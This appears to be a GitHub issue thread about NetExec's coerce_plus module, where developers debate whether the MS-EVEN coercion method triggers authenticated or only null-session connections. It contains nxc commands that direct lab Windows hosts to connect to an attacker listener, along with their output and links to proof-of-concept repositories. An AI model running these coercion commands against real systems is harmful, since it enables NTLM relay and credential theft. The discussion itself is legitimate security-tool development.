coerce_plus: MS-EVEN not working
The MS-EVEN method used in coerce_plus is not working on the machines I tested (Win 10, Win 11): there are connections being triggered, but they are null sessions. When I looked at the PR, it looks like @NeffIsBack had the same results in the screenshot: https://github.com/Pennyw0rth/NetExec/pull/300#issuecomment-2395107662 Are there any cases where this attack actually uses credentials?
$ nxc smb -u user -p 'user' --local-auth -M coerce_plus -o LISTENER=192.168.56.111 METHOD=MSEven -- 192.168.56.113
SMB 192.168.56.113 445 WIN11VM [*] Windows 11 Build 22621 x64 (name:WIN11VM) (domain:WIN11VM) (signing:False) (SMBv1:False)
SMB 192.168.56.113 445 WIN11VM [+] WIN11VM\user:user (PRIVILEGED!)
COERCE_PLUS 192.168.56.113 445 WIN11VM VULNERABLE, MSEven
$ nxc smb -u user -p 'user' --local-auth -M coerce_plus -o LISTENER=192.168.56.111 METHOD=MSEven -- 192.168.56.112
SMB 192.168.56.112 445 WIN10VM [*] Windows 10 / Server 2019 Build 18362 x64 (name:WIN10VM) (domain:WIN10VM) (signing:False) (SMBv1:False)
SMB 192.168.56.112 445 WIN10VM [+] WIN10VMREAL\user:user
COERCE_PLUS 192.168.56.112 445 WIN10VM VULNERABLE, MSEven
NetExec info
- OS: debian
- Version of nxc: https://github.com/Pennyw0rth/NetExec/commit/e19868ec
- Installed from: github
EDIT: In the original POC ( https://github.com/evilashz/CheeseOunce ) the author says:
The MS-EVEN running under the NT AUTHORITY\LOCAL SERVICE account, and this account can't provide valid credentials during network authentication, so in the NTLMRelay attack it can't work, like this (Sorry, I didn't test it fully before pushing it):
Maybe it should be removed?
Haven't figured it out yet, but the first time I tested it, it didn't work; the second time I tested it, it did work. Not sure what the problem was, but at least sometimes it works.
We had the same thought, but maybe it was just a false positive due to it being used together with the other methods most of the time. In the reply you posted in the merge request, you said that it worked, and according to the screenshot no authentication data was sent. Additionally, the service runs network restricted, so I do not see how it could work at all. Or are there Windows versions where the eventlog service is not running as network restricted?
Looking at the Wireshark traffic, you might be right: there is no auth info sent in the NTLM request. Maybe there is an edge case where the service isn't running in network restricted mode?
What is really weird to me is that we still get a STATUS_SUCCESS back from the server when authenticating locally (only on the DC though). That doesn't make sense to me.
If you do not see the message "Exploit Success, eventlog\ElfrOpenBELW" when using the LISTENER parameter (NetExec coerce_plus.py, line 923), it means the MSEven vulnerability has been fixed.
If the host's even/even6 RPC connection is available, it's an indicator for MS-Even.
@lodos2005 Do you happen to have any Windows version/configuration where the RPC function resulted in an authenticated connection?
I'm closing this, recently @Cross-thunter showed that MS-EVEN can be used in conjunction with a known malware to coerce Windows Defender and co. into connecting WITH authentication: https://github.com/Thunter-HackTeam/EvilentCoerce
I failed to replicate it on an up-to-date Windows 11, but on Windows 10 this worked flawlessly!